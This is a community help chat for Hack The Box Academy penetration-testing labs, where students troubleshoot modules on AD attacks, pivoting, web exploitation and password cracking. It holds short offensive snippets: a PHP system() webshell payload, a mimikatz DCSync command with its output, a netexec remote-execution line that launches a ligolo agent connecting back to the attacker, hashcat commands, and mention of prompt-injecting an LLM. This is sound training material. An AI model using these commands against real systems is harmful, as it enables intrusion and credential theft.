#modules

Hey there , I'm stuck in introduction to bash scripting module. In the flow control loops section. Can someone help plz

That's the one that has you decrypt right?

Yeah

echo $var | wc -l not ${#var}

let me try that

Its an off-by-one issue, the author doesn't intend for you to use ${#var} in this instance

salt=$(echo -n "$var" | wc -c) , right?

Yeah -c not -l my bad

no worries

just tried that. it gave me the decrypt error & printed an incorrect value for salt

Then your loop may be wrong if the salt is wrong

yeah , could be

Simple debugging would be printing the count variable out every time the loop executes

Anyone doing web fuzzing?

I am stuck for more than 5-7 hours, not getting the exact parameters. . Or i am looking in different directory!?

Previously i got a clue about a parameter in one directory but not getting that directory! Tried for long 🙁

I’m not sure if this is relevant to your case but I was in the sharphound section and I kept using the sharphound.exe provided by HTB in C:\Tools, the legacy version and parsing it through the CE Bloodhound(apt package on kali) on my attack host. That was the root of my issue.

I had to install the latest sharphound.exe from the official GitHub repository and it worked well

Or alternatively use the legacy bloodhound provided in tools with the legacy sharphound

Skills assessment has the zip file in it, so you don’t need to gather the data, it’s already provided and I am using it but idk what’s wrong with it

The skill assessment might be providing data for the legacy bloodhound maybe ?

Maybe try with legacy bloodhound

Cool, will give it a try, thanks !

Found it!

Thank you sm for your response

@fathom pendant just tried that. didn't work sadky

but thanks again for your support

Can I DM you about this? I got the users but all sprays etc is taking ages. Could use a nudge in the right direction 🙂

Could I DM someone for help on the Attacking Common Applications - Skills Assessment II question 1? I've completed skill assessment 1 and 3, this is the last question I need for assessment 2, What is the URL of the wordpress instance. I got the sub domains, B***.domain.local. and I thought I found the WP instance at wp-login.php but apparently thats not the instance?

I want help in Identifying Unkeyed Parameters section from Abusing HTTP Misconfigurations can anyone support ?

I'm in Penetration Tester - Attacking common services - Attacking SMB - When I try to get the password for jason, using the provided password list in the resources section with crackmapexec, I get hundreds of STATUS_LOGON_FAILURE, for each username:password pair.

is this bugged or am I just cooked. I did everything else in this module but I feel like this is such a simple question that I might be overthinking?

Im cooked.

i believe nxc/cme has -windows-auth or -local-auth (i forget which it is)

@fathom pendant This is being run against the target of the module, which is a remote linux machine..? Do you have to specify anything for that?

add --local-auth

that's for non-domain joined machines

this is literally mentioned in the reading

@fathom pendant

Hey guys, can anyone help me in the web pentest path web proxy module

I am trying to make command injection via the burp and kinda stuck with it

what specific section?

Repeating requestes

I did most of the work of doing the match and replace to make the injection on always

dm me what you've tried; (you also don't necessarily need to do the math&replace)

this section takes advantage of burp's repeater

if you right-click a request you can send it to repeater to modify it

the question is from the module introdutction to windows comannd line

its on the skill assessment

last question

knowledge check on getting started module
I was able to guess admin credentials and ik the current apache version is vulnerable to rce but I have tried modifying all the php files with payload <?php system('id'); ?> and i dont think any of those is vulnerable
ik these files are hosted at http://10.129.230.184/theme/

none of those match

humm

Ok I will try all properties

Did not work

atp I just wanna get the answer, idk why isnt working

Got it

The problem was that I wasnt on the domain controller

are you looking at the DC?

ahnvm i see you figured it out

It took ages with me too.
Try reversing the order of the list of users and spray again, it shouldn't take long.
I don't remember if it's possible or not as I do not remember the lab much, but if it is, use kerbrute for spraying it's way faster than netexec.

The reason is the list has a lot of duplicates that causes it to take a lot longer than it should. Sort the list using unique option.

Can somebody help me with the rce via the theme editor-section on the module hacking wordpress?

I tried the steps it told me on the explanation but i cant find the flag

Pm

I can see that alot of people are having issues with Logrotate, i have the command and i can get it to run, if i dm my command, can anyone confirm that im right ?
i followed the guide and done both create and compress. and i have tried all three versions of rotten with 2 rev shells and a copy of the root bash
the rev shells work when i run them as htb-student. just not with the exploit :/

got it working now, just took many many runs

Need a hint for the Footprinting Lab - Hard.

for the foothold: UDP

Module: Using CrackMapExec
Proxychains with CME

For some reason -x in netexec isn't processing the command after space normally.

$netexec smb <ip-addr> -u grace -p Inlanefreight01! -x "C:\Windows\Temp\agent.exe -connect <ip-addr>:11601 -ignore-cert"
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp]
[--dns-timeout DNS_TIMEOUT]
{mssql,smb,ftp,ldap,nfs,rdp,ssh,vnc,winrm,wmi} ...
nxc: error: unrecognized arguments: -connect <ip-addr>:11601 -ignore-cert

$netexec smb 10.129.204.178 -u grace -p Inlanefreight01! -x "C:\Windows\Temp\agent.exe '-connect 10.10.14.174:11601 -ignore-cert'"
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp]
[--dns-timeout DNS_TIMEOUT]
{mssql,smb,ftp,ldap,nfs,rdp,ssh,vnc,winrm,wmi} ...
nxc: error: unrecognized arguments: '-connect 10.10.14.174:11601 -ignore-cert'

Found this on github https://github.com/Pennyw0rth/NetExec/issues/621 but couldn't it to work.

Did you try with "nxc" instead of "netexec" I also had these issues, encapsulating in quotes did not work either. Worked after I used nxc instead

wow, works with nxc

Appreciate it.

annoying right 😄 glad it worked

the same problem too, can anyone help?

I followed the lesson and built the msfvenom payload, then started an nc listener. I can see the target repeatedly making requests, but no matter how many times I restart it I never get an RCE.

Any1 that finished the "Using CrackmapExec" skills assessment and can give me a nudge on Question 3? about DEV01

Hi, for the Applications of AI in InfoSec - skill assessment. Is there any specific extension to save and upload the model on? I'm getting 0 accuracy all the time when uploading

hello, can anyone help? i am doing local file inclusion module LFI and file uploads, i uploaded file and got the web shell but i cannot find the flag.txt can any1 help?

use find to search for the filename.

find does not work also

idk why but pwd works but for instalnce cat 0x70.txt

does not

maybe its because space filtering but i fix that with %20 or +

I think it's something like cat+20+flag in the folder

Use *

Hello! I am on the "Active Directory Enumeration & Attacks" on module "DCSync" question 2. I have launched powershell as user 'adunn' and attemping to run mimikats for the DCSync attack. I am getting the following error. I also looked at the solution and it seems I am running it correctly:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\syncron
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\syncron' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)

imma try it

it does not work

or use grep HTB{*

yea good idea )::: how did i not came up with that

Does anyone know whether the EU server's are fixed on Acadamy yet? Thx

Hi
I need help please module Windows escalation privilege interactive with users
I created @inventory.scf file and start the responder. But it not works anyone can help me?

Hey anyone finished the XSS Phishing section of the CBBH path?

Just for reference: This was a problem in parrot's version of netexec (all fixed now), but the latest updates weren't pushed to the apt repos yet (that will likely only happen for parrot7)

yes I have the same issue

Wanted to ask what im doing wrong :D

everyone getting very study

I am absolutely lost in the Skills Assessment for the Incident Handling Process module;

The very first question is:
Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section?

However, there does not appear to be any instruction on how to Check VirusTotal (as there are questions after this that asks for the same thing). I found the ip address it pointed to, but the real virustotal does nothing and returns nothing on it. In that case, is there somewhere I'm supposed to be looking in the pwnbox itself on theHive? Because there is no clear direction here and I've been sitting on this for the better part of an hour trying to figure this out, hah.

VirusTotal has three different tabs representing three ways of search

Aye, I plugged it into URL and Search; nothing came up unfortunately

I just did a search using the IP address and managed to get a result, make sure you have the correct IP address

Wh-

Sure, I'll go back and check one sec!

I remain confused; I grabbed the only address in the comments of the alert which starts with 203, tested with both port and not using the port, searched it on VirusTotal and it came back clean every time

Carefully read the question again and you will notice something that you are not paying attention to, when you search about it everything will click

Hey everyone. I just started the Attacking LLMs module and I'm having trouble getting the flag on the "Cross-Site Scripting (XSS) 1" lab exercise. I'm capturing the cookie but it's not giving me the flag. Am I supposed to do something else with it?

Think about the encoding of the cookie

OHHHHHH, ok. Thanks!

Got it. Thank you, so much.

Well, as it were, the issue was on VirusTotal's end. I dont know what I clicked on the website, I did nothing different as far as I can tell, and searched the exact same way, however this time two new tabs came up that stated details and relations, which were not there before (as it just showed detections and community previously). I don't even know what changed, because I copy pasted the URL the exact same way as I had been; so while I now I have the next step (I think), I'm still confused, just by Virustotal now lmao

Genuinely flabbergasted, because I did the same thing I had been doing for the better part of an hour, just to check once more - so, thank you I reckon? Maybe asking is what changed the quantum state or something Idk, but I appreciate it lol

Ahhh. . .I have figured that out as well. It had autoconverted the IP into an HTTP url. So it was searching as a URL not as an IP.

Thank you dpgg lmao

Is anyone experiencing connectivity issues with box websites? Taking a couple minutes for a page to load, and doing IDORs isn't fun when that happens lol

Yeah I'm a bit confused if my module is having trouble working or I'm doing something wrong

Doing Mass IDOR Enumeration and have gone through all 20 uids like the question suggests. But, I'm just getting a blank page. Have tried manually in the URL, the Bash Script the module provides and Burp Intruder.

Any help pls

Hi, Im on the Attacking Web Application with Ffuf module, in the skill assessment, i belive i find the correct answer but they keep notify me that its incorrect, how can i get support about this?

Hey hope all is well, on Cross-Site Scripting (XSS) - Phishing I am pretty sure I have the correct payload for the /phishing/send.php page, anyone finish the module that can have a look please to confirm im not missing anything? thanks in advance!

So I’m still currently stuck on the responder module as a novice unable to get the responder.py to run

any help on Parameter Logic Bugs SA, I managed to unlock all modules but still cant find the flag?

Even the locked ones??

yes I did, can I DM?

someone please assist

maybe follow the instructions the command gave you

do a locate Responder.py

then what after if it still says the same thing

ain't no way it says the same thing

show

try ./Responder.py

why are you trying to run Responder on the pwnbox, and not the attack machine vm?

also that's the starting-point pwnbox; so #starting-point

so i should do it on my virtual machine instead with openvpn?

they directed me here the last time i asked about one of them there

yeah and i'm directing you to the proper location; also pwnbox has a tun0 ip, i didn't see it was starting-point so I may have misspoke.

Ah ok thanks

yep!

In the WPA2 4-way handshake diagram, I noticed that SNonce is shown being sent from the Access Point to the Client. Shouldn't SNonce actually be sent from the Access Point to client in image 1?

Huh, the traffic is a lot slower than I expected

i just keep getting "connection refused" has anyone used ligolo for the AEN specifically ?

Hiiii is there any better alternative of link2 while using RDP it really sucks 😭

You're very close, look at the ss again and try to identify the UID of the application.

You need to install myapp_adb.zip

Also does anyone have completed shells and payloads?

What have you tried so far?

Use the manual process will yield the same result.

What have you tried so far?

Look at the code, especially the required http when constructing the http request.

User the recommended version of frida.
I use uv as a package manager to install the specific version.

What did you get?

what have you done and what was your result?

This is the problem
You need to Open python server in port 4444, because You configured redirect ports from 4321 to 4444

What Frida version are you using?

What is your first step after downloading the assessment package?

You can dm me

ive tried that as well and it did not work i was only able to transfer the files using "listener_add --addr 0.0.0.0:4321 --to 0.0.0.0:4321 --tcp" i really dont get the issue tbh

what step did you get stuck?

@vagrant wraith ive already told you several times to stop spoiling info regarding AEN module as its tier 2

Your problem is youre fundamentally misunderstanding how the listener works

--addr is an interface on the host youre proxying through --to is going to be the address youre routing the forward to

sorry wont happen again my bad!

A; B; C
A is your machine that only had access to B
B has access to A and C
C only has access to B

When you set a listener on addr B:1234 to A:4321, you have to send a connection from C to B:1234 that will then be forwarded to A:4321

Because C does not have a direct line to your host machine, you have to forward information.

A <-> B
B <-> C
A <//> C (directly)

It sounds like you didnt pay too much attention to the pivoting module

i really didnt ..

thanks for trying to help and btw i got it working and finally got a shell !!!! but again i guess cant spoil the issue

Your major issue was not understanding the basics. Aside from that, likely some other fundamental issues

Go back and learn it mate, pivoting is like half of what you do in networked environments

If youre struggling this hard with AEN I suggest going back through the modules

Help anyone I am stuck to answer the SQL injection fundamental question for :

1. What is the password hash for the user admin ?
2. Archieve remote code executation and submit the content of /flag_xxxxxx.txt below

because I can't shown the login page after activate the burp proxy.

How to solve.

Forward the request in burp proxy

got this error message forward the https://localhost/login.php am i doing the wrong way ?

why are you doing https?

and localhost

wrong address and protocol scheme

the target doesn't spawn in your local environment; so localhost isn't gonna go anywhere fast

Try to understand how pivoting works
Do a personal lab , y recomennd You use ligolo and play with that
Try normal pivoting and double and triple pivoting, and understand how redirect Port works
In the exam or aen i recommend to use ligolo because its more easier that other pivoting methods of the course

don't have to tell me mate I have the cert

also as much as I like ligolo I'd advise learning how to do it with chisel/ssh and proxychains as it may be harder but it gives you a better understanding of how pivoting works overall rather than just: spawn agent go brrrr

Yes personally i don't like other methods because You need to use proxychains and You have limitations
Ssh pivoting method maybe is usefull only for redirect ports
With ligolo You can use nmap in your own machine

put like this for the target ip and port show another error

looks like it IS https then;

thank you for now for your guidance it shown now the login form.

Good day all. Please which wordlist am I suppose to use for the exercise in the Burp Intruder section of the Using Web Proxies Module. i have been on these for quite awhile. Please any hint would go along way!

i believe the module tells you a specific wordlist to use

Hey all, just wondering if I'm missing something here about the Academy? I purchased the Metasploit Framework module. It starts with a preface telling us not to rely too much on tooling, okay.....the second page is two questions about Metasploit when it hasn't actually taught anything about Metasploit yet. The third page is just a blank screen. It then goes onto Unit 2, where it jumps right into a practical exam, again without yet teaching anything about Metasploit

I feel like to complete the Academy module I need to ChatGPT / Google everything, is this expected?

everything required to answer is provided by the module

I'm on Section 2 and so far it's said absolutely nothing

The preceeding screen, Introduction To Metasploit, was just two exam question which I had to Google

this is on the v2 beta yeah?

turn off the beta view and return to regular view

No. I used the wordlist from the section and nothing return 200 OK except index.html!

did you perform the attack as described by the module?

i just loaded the module in the beta view; it's working fine for me do you maybe have extension running?

yes! I did. All the payload configs and setting are same as the module's own. But I don't know where the issue is from the following: GET /admin/1.html HTTP/1.1

Ah thank you, that's solved it! Apologies I switched to beta the other day and forgot, this is the first module I'm doing.

My Firefox browser is almost vanilla, just has Proton VPN installed and running, but I doubt that's blocking HTB content.

I can see the content now 👍🏻

wrap the 1 in the payload markers so it'll look like §1§.html

i don't have proton vpn and it launched fine; perhaps something in proton's thing is blocking it

Is Wrapped! the markers removed when I pasted it here!

i'm just making sure

and you're using common.txt from SecLists?

yes! All the payload's configurations are same as being contained in the section in question!

dm me with a screenshot of what you're doing

Alright!

just did a sanity check and did it exactly as shown and it worked as expected

hey guyz i am stuck on Skills Assessment - SQL Injection Fundamentals
i am able to bypass login but no clue after that so anybody can guide please

did you mess with all the functionalities of the app?

I have DM you as you instructed. Please reply!

Had to scratch my head a bit here too. But following the steps in the module (the manual approach or the automated script approach presented) will ||get you to a location from where you could perform a file transfer of a program ||that might allow you to do ||a sync of something or other ||where you can dump out the relevant user hash.

i cant solve this question: After performing the DCSync attack, connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the Task Category of the events generated by the attack?. There are no logs for the event id 4662 or the user rocky, i tried every task category i've found in logs can someone help me

does anyone know if the sliver module covers evasion?

Hi everyone, im getting this error, does someone know how to resolve?

I feel like I'm missing something for Web Attacks | Mass IDOR Enumeration any uid I try takes ~5 minutes to load and is blank lol

Let me check Splunk - I'm at the office right now and might be able to find something for you to work off of. What is the actual question?

i already found the answer

thanks anyway

oh alright, sweet

insufficient memory available... also the file.hash goes first before the wordlist

try this: hashcat -m 22100 -a 0 file.hash /usr/share/wordlists/rockyou.txt --show

it's thinking you want to use file.hash as a wordlist against rockyou.txt with the hashfile... and Rockyou is a LARGE file

Marcie, do you by chance have a nudge on something I'm maybe doing wrong for this module?

the only thing i can think of is making sure your request is formatted correctly

Oh even if I go to the website in a normal browser and just solely click documents it's taking like 5 minutes to load lol

Have thrown in to repeater and had repeated change the request type to make sure things are formatted correctly as well

JtR as well?

that sounds like an issue with your connection then

Which is odd, restarted laptop, vpn and everything.... regular browsing is working fine too

JtR has the --wordlist= option, so it's more lenient

assuming you restarted the lab, also iirc the vpn isn't required as it's an ip:port

I use vpn just to be safe while I'm at work lol

I can try w/o though

then it could be an issue with your vpn causing some kinda issues

yeah getting same thing w/o vpn

this webpage in particular is taking ages - not sure if it's something on the boxes end though?

Hi, for both AI evasion - first order attacks and AI evasion - Sparsity attacks you apparently don't need a VPN to connect to the modules, however, unless you are in a pwnbox you can't access any of the generated skill assessments - thing is you can't actually complete these skill assessments in the pwnbox due to the ressource intensive libraries and tools we're using.
I have tried with and without VPN but I just can't access them, any advice?

Hi, in the Active Directory Enumeration & Action (Initial Enumeration of the Domain) I have an issue regarding the connection to ssh, I used "nslookup inlanefreight.com" to find the address" but when I try to ssh using the sss username@ip it doesnt work.

inlanefreight.htb/inlanefreight.local != inlanefreight.com

there should be a 'spawn target' button

Have just gone through a miserable 990 package update && upgrade on my kali - and this module's website is still taking about 5 minutes to load anything I click on... Is someone able to verify this is on my side / box side?

Web Attacks | Mass IDOR Enumeration

Please @ with replies

Disregard - after 20 minutes of loading got it

Can someone help me with payload and shell the live engagement

How can I find vulnerability on target when I can only use link2

The site name blog.inlanefreight.local

perhaps looking at the website, examining the source code, etc. also firefox is installed on the jumphost

Also can I share one more pic?

Like I use hints that have credentials for login but how can I find those credentials without the hints 😭

which one

can u PM me

Sure

the desktop

:)

I also stuck at the same module

Not able to pm you

already send u friend req. can u check

That helped a lot 😮‍💨

the jump host has credentials on the desktop :)

@inland oak thankyou 😭😭

This is a stupid question i think. In the Command Injection sections, they explain that if you want to check whether validaiton is being ran in FE we can just check it on the network section. Does that apply universally?

I've been working on the passwords attacks module. I am trying to set up the pwnbox so that I can run some netexec commands like the questions asks. When I try to download the vpn connect file or the network services file it just infinitely loads, any suggestions?

u dont need vpn

with pwnbox

its already connected to the network

Any idea why the wget network-services command isn't working?

not sure what u are trying to do

I need to download the password.list file from there, can't open it in firefox

so I can run a netexec command

why it doesnt work in firefox ?

Not sure, the pages just load and then it says "connection timmed out"

download the file with your own browser then

and then copy paste the password list

gotcha

for nmap in general if i want to scan a UDP port like IPMI i have to use -sU. does that mean the normal scan does not scan UDP ports and vice versa? (so the UDP scan does not cover tcp ports?)

I'm doing the final part of the skill assessment in cracking passwords with hashcat.
How long is it supposed to take to find the final flag?
I cracked a bit over 500 hashes and the most common ones I've found so far has only been used 2 times, which seems a bit little imo.

disclaimer: this could be spoilers for current students in the penetration tester job role path in password attacks module so please if you still haven't reached it yet don't open the image and don't read the rest of this message

Alright this must be broken, so i was in the password attacks module, in the "Credential Hunting in Network Shares" section, and i AM frustrated, so in the exercise there this nxc command that was mentioned in the section, and everytime from my local and even from the pwnbox i get this error

ERROR NetBIOSTimeout on target <ip>: The NETBIOS connection with the remote host timed out.
i tried different smb timeouts nothing worked, if someone has any idea what can i do that would be appreciated

Web Attacks | Bypassing Encoded References

I've downloaded all 20 pdfs, but they're all blank?

nevermind - had to after re-downloading them all, we're good now

mods will probably remove this fyi, despite the disclaimer...

well maybe not, but usually they ask to remove any content from modules above tier 0.

then who can i ask for help🥲

run --debug with that nxc command, might be something in there that better explains it that error is quite generic

Thank you! I will try that

also what version of netexec have you got installed?

if its v1.3.0 or newer the bug with NetBiosTimeout is 'fixed gracefully' but I don't usually find much luck like that 😄

Version : 1.4.0

but weirdly that 'fixed gracefully' github ticket i searched for doesn't seem to be applying in my case🙃

you know that command, try "netexec" instead... im curious

nxc and netexec operate differently for me. Probably different versions but they also tend to fix issues each other face

i don't reallt think they differ but i could try it if thinks get sketchy, but for now, the academy target machines doesn't seem to be stable( or atleast for my current module) they disconnect randomly when i am in the xfreerdp session or using the ping command(even from the pwnbox), maybe i will take a small break and come back later

at least in one other users experience and mine, they do differ, but usually netexec has issues that nxc solves (but thats not much of a dataset to prove anything 😄 just confirming my bias really)

here for example

well worth taking a break, hope you crack it!

Thanks mate! Much Appreciated❤️

figured out the final flag in hashcat skill assessment. don't understand why I didn't just make my life easier from the start....

for some reason I made the bold and moronic assumption that surely the hashes had to be salted...

is the web fuzzing modules new? swear i covered fuzzing in another module

yes, I think it's part of the CBBH -> CWES change

ah makes sense, yeah i had the cbbh path mostly done then swapped off for some blue teaming stuff and it popped up as a module i missed lol so thought it must of been added

I see, so you’d have to do these modules again to take the cwes exam?

possible i didnt finish the path or do the exam yet tho, so theyd have to be done as well yeah

Hello I'm stuck on API Attacks
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
can any one help

Hey hope all is well, on Cross-Site Scripting (XSS) - Phishing I am pretty sure I have the correct payload for the /phishing/send.php page, anyone finish the module that can have a look please to confirm im not missing anything? thanks in advance!

Or happy to show my current payload

Hi guys, I am completing the graphql modules , specifically information disclosure. I found what appears to be the flag for that question, but it is not accepting it. It is in the regulations htb… format. Is there an issue with that lab?

I tried those, didnt work

looks like the ans was based on ttl value

You can try a little guess work if you don't mind

had to look up default ttl values but I was trying to get a concrete answer from the scans but to no avail..

@jovial walrus I deleted your post because I think that module is above tier 0. Please take care not to post content from modules above tier 0.

sry idk what this means?

and in which channel do I post queries then?

Modules are ranked by tiers. You can only post content from modules that are tier 0. You can ask questions about modules here.

for cpts path how do i find out what module tier these r and where to ask ques from modules above teir 0?

It's on the module overview page

^

ok i see it on the new layout

so i can ask ques from other module tiers on cpts channel ?

You can ask whatever questions you want from any module here. Just don't post content from the modules themselves. ie. screenshots of the modules, usernames/passwords/commands/etc.

You always want to mention the module, section, and question you're stuck on. People who can help have already done the module and don't need extra context like a screenshot of the content itself.

And if you feel like you need to reveal a little more info you can ask someone to take it to DMs

ah ok

anyone have any tips on the command injection skills assessment? just a nudge in the right direction will do!

Is anyone having difficulties in answering the questions in the modules due to case sensitive and other things? I have been typing in the correct answers yet it still says incorrect. Then I will copy it and paste it then all of a sudden it accepts it. I literally stayed on 1 section for over an hour raking my brain and rereading the section like 3x to come to find out I had the answer correct it just wasn’t accepting it because of a case sensitive which in the section it wasn’t even CAPITALIZED!! 😅😅😅

Maybe its because Im still on the free option anyways give me some feedback thanks

Most of the questions are case-sensitive

Ok cool, appreciate it

guys what is the answer of this question?

I tried Fiber optic cable but it was not correct

the format is a bit specific for this one iirc?

i think it's fiber-optic cable

ok trying

no it is also wrong

I am using academy 2.0 let me revert back to the legacy mode

which module and section is this?

ahh nvm i found it

yea it's fiber-optic, i.e. without the cable @glad oxide

ok trying

thanks it worked

Which protocol manages data routing and delivery across networks?

what about this one

does it Internet protocol?

its the abbreviated version

only IP?

I tried both but nothing worked

thats one part of it

TCP/IP?

it is a whole suite

try it

trying

worked

but how?

the answer should be only IP, isn't?

I think it's bc IP is responsible only for a part of the whole process, i.e. the source and destination ip address of the packet, and the question was more about the entire flow of data between networks

Transmission control protocol. It's on layer 4 of the OSI model, the Transport layer.

That's how I remember it

Yeah I know that but it asked protocol that manages data routing

yeah that could may be the answer

Hey I am trying to exploit eternal blue smb but how can I get smbpass and smb username

I'm like 90% sure it's because ip handles the routing of data and TCP delivers it.

yeah that can be the more specific reason but isn't the TCP handles the delivering of data in a particular node with the help of ports number?

You're correct, but like I'm pretty sure the structure of their question is the reason for this trip up. Me personally reading what you pasted makes me think of it as a combined answer vs just TCP.

That's about all I got for yah

Ohk understood

it's in the reading

Hey guys and Ladies i am realy confuse. I am stuck on the second question of the "Windows File Transfer Methods" Module on the Pen test path.I have done everything according to the question put the Hash generated as per the question is wrong. Please assist?

i'm not seeing anywhere here where you unzipped the file

I believe there's an existing "upload_win.txt" that is a red herring but it's been a minute

Thanks for the reply ill investigate further.

OMS in such a dumb_ss i renamed the upload file......

still not accepted ...Please assist? @autumn pilot@gilded lion@fathom pendant

you didn't name it 'upload_win.txt'

OMG! I feel so dumb! Well i am going to leave this here so ppl can see and maybe learn from my mistake lol. I got the answer thanks so Much for your help 🧡

bro anybody interesting forming a group of beginners learner in cybersecurity where we come daily and write our goals for the cybersecurity and discuss what we all learned and share things and knowledge together?

Owlsec is a huge cyber community that you can join. 130k members

Yeah I know that but I am looking for some members with whom we can create group seperately

hi looking for people to study for CPTS , a study group, dm me guys

Guys i have a question for this lab:
"Find another valid user on the target GitLab instance." - Attacking Common Applications module

it's been 2 hours trying to brute force the username using || 10 mill || wordlists from seclists, am i on the right track?? i found several user but none of them is the answer.

use cirt-default-usernames.txt wordlist

thanks, bruh i didn't think usernames can be case sensitive 🫤

on metasploit framework CPST path is really make my brain explode.. it is really hard to get the answer .. 😂

anyone can help ?

i found the www.d*** .. but to access the root require password. I have done everything I have

anyone

On which question do you need help?

The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.

I need help with the question above .

Drop in a shell, find the version of sudo, exit the shell, background the session and search for a module that can exploit it

THANK YOU SO MUCH

I did it

Hello, I am new to the Discord. I am having difficulties in the final skills assessment portion in the AI Red Teamer Job Path - Prompt Injection module. I already gained access to the admin panel and got the admin key. I am having challenges convincing the backend chatbot checker to ban the CEO. Any assistance with this is greatly appreciated.

DM me

morning all! i'm having a bit of trouble with the command injection skills assessment. throughout the module, it teaches to rely on output from the application to tell whether the injection is successful or not. but i am not reliably getting the same kind of errors from the application in the skills assessment. any help would be much appreciated

Hi guys. I have a question about Hack The Box Academy module: OSINT: Corporate Recon
Module name: OSINT: Corporate Recon
Section name: Contact Information
I sucks in the following questions, please help. Thanks.
Question: What is the email address for enterprise customer support?

What I tried.

1. Went to https://www.inlanefreight.com/index.php/contact/
   Then pasted enterprise@inlanefreight.com as my answer. But it showed "Incorrect answer!"

2. I already checked the hints but don't understand what should I do?

3. I also did a Google search but can't find the answer.

What kind of information did the error show? Maybe someone can help u. Also, which question u are trying? Did u looked for write up?

that module is tier 4 so there won't (or shouldn't) be any writeups

When a box module rick rolls you.... I'm leaving HTB

hi everyone, in AD domain, authentication server and TGS are both inside the DC?

About Kerberos auth

they can be, sometimes they are on separate machines to further increase security through delegation

Hi, I encountered some issues with the file inclusion skill assessment and I want to know why that happens.
Spoiler:|| I saw that the right payload was not working from the browser URL but was working from the curl command. Because of this using ffuf I have never been able to get a positive result even that the payload was in my list.||.
I also noticed that the page is not displayed properly in my browser. I used browser box provided by HTB.

Module: AD Enum & Attacks
Section: Skill Assessment Part 2

While running ||responder|| from the Linux Host, I get the text
||Skipping previously captured hash for inlanefreight\user||
However, it never captured it before or displayed it. Is there a log file where it’s stored ?

Check /usr/share/responder/logs

could anyone point me into the direction where I can find the flag in the Attacking AI - Application and System - Rouge Actions question? I went through all tables in the db with the SQLi but I'm either completly wrong or have overlooked something...

when i will complete the penetration tester path, will i be ready for the CPTS immediately?

If you complete AEN blind, (no asking for hints, not reading the module, not reading the questions), then you should know which parts of your methodology may be lacking/review before the exam

AEN?

Attacking Enterprise Networks, it's the last module in the path

i am at the 30% of the path, the road is still long

do y'all think this cert is better than a Master’s degree program?

most practical certs are gonna overshadow degrees

it makes sense

also a master's degree when you have no experience is generally gonna shoot yourself in the foot, a bachelor's is generally what most entry level positions want

i have 2 exams to get Computer Science bachelor, and im thinking to do CPTS, eJPT and OSCP in the future

this for red team only, and something about blue team as well

Thanks man !

hello I'm stuck on API Attacks
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.
I need help

hello i need help on the Login Brute Forcing module , skill assessment part 1

what do you need

thanks man, it was a connection issues

no probs good luck in the path

can anyone help? when i was doing cbbh path i missed this Using Web Proxies Repeating Requests cuz i found the flag and it said that it was not correct, btw yes, i found the flag in another directory, can anyone help? it still does not work

am i doing anything wrong?

yea also there are two flags and i compared and they are identical so maybe the machine is broken

Hello Everyone, I have a general question While doing tasks in the academy we are provided with the rdp is there any way we can connect to machind command line without rdp I tried winrm but the creds are wrong + I am not admin so Can not use psexec also I am on windows privlage escaltion module

Hi everyone I’m on the Getting Started module of the Penetration tester path and having frequent connection timeout issues with the target machines in the exercises. Im trying to connect from the pwnbox. The target url initially works but soon after times out frequently and requires multiple refreshes before it is accessible again. I’ve tried restarting my pwnbox and target multiple times but same issue. Is anyone else seeing frequent connection time out issues with their target boxes?

I would have frequent connection timeout issues when failing to manage my VPN usage. For example, if you leave your VPN connection up on your computer at home, then try to use pwnbox at work, you're going to have a bad time. There was also a period of several weeks where I just couldn't maintain a connection long enough to complete exercises, only to discover I left my VPN connected on a VM on a separate desktop I completely forgot about. 🤦‍♂️

tl;dr check and/or refresh your VPN file, and failing that, try changing your pwnbox location

Thanks I’ll try what you mentioned

hello was wondering if i can bounce something off yall

https://dontasktoask.com

I'm stuck on a module. I have got all other questions correct, aside from What is the kernel version used by the Linux target? (Format: x.yy.z). I can not for the life of me get it. I assume skill issue but there is only one kernal version to put in.

It helps if you provide the module name and section name

fair enough Pentest in a nutshell linux initial access

Did you first try what's mentioned in the module, bearing in mind the question seems to be asking for version number not flavor as well;
So not Ubuntu 1.23.4
Just 1.23.4

I did not do just version

thanks for the assist. i feel like an idiot.

You get used to it

Hello Everyone, I have a general question While doing tasks in the academy we are provided with the rdp is there any way we can connect to machind command line without rdp I tried winrm but the creds are wrong + I am not admin so Can not use psexec also I am on windows privlage escaltion module

Only if the service is open and your user has permission to use it.

What’s the best way to take notes for the modules I solve in the pentesting path? Should I copy all the commands I ran to solve the exercises and paste them into a note taking software? And what note taking software do you recommend?

Let's break down why copying the commands to solve the exercises may not be all that helpful in the longrun:

• They are generally specific
• They don't show any sort of intuition or knowledge of why it worked
• They often don't show the context

I use obsidian for my notes, whenever I'm given a command/syntax i break down the options that are used alongside the context in which I may use it (if it's not implied); i.e. If i have a page that's just SMB related commands, I don't need to specify that the command works for SMB

Hi guys. I have a question about Hack The Box Academy module: OSINT: Corporate Recon
Module name: OSINT: Corporate Recon
Section name: Contact Information
I sucks in the following questions, please help. Thanks.
Question: What is the email address for enterprise customer support?

What I tried.

1. Went to https://www.inlanefreight.com/index.php/contact/
   Then pasted enterprise@inlanefreight.com as my answer. But it showed "Incorrect answer!"

2. I already checked the hints but don't understand what should I do?

3. I also did a Google search but can't find the answer.

Anyone can help would be appreciate?

Software: Obsidian
My approach is by understanding what the questions asked me to do during the pentesting path.

1. Then I open a new section that talked about a specific topic, for example Footprinting.
2. After that I copied commands I actually used during the exercises, you can also put related questions and screenshot for reference later.
